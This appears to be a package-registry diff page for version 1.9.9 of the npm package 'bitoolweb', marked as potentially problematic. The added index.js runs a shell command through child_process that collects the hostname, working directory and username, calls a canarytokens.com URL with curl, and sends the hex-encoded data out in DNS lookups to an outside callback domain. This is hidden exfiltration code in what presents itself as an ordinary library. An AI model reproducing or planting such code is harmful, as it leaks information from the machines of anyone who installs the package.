bitoolweb 1.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of bitoolweb might be problematic. Click here for more details.
- package/index.js +14 -0
- package/package.json +11 -0
package/index.js
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
|
2
|
+
const { exec } = require("child_process");
|
3
|
+
exec("a=$(hostname;pwd;whoami;echo 'bitoolweb';curl 33yqym7q4azolmt4ba2kg9txt.canarytokens.com;) && echo $a | xxd -p | head | while read ut;do nslookup $a.bind9-or-callback-server.com;done" , (error, data, getter) => {
|
4
|
+
if(error){
|
5
|
+
console.log("error",error.message);
|
6
|
+
return;
|
7
|
+
}
|
8
|
+
if(getter){
|
9
|
+
console.log(data);
|
10
|
+
return;
|
11
|
+
}
|
12
|
+
console.log(data);
|
13
|
+
|
14
|
+
});
|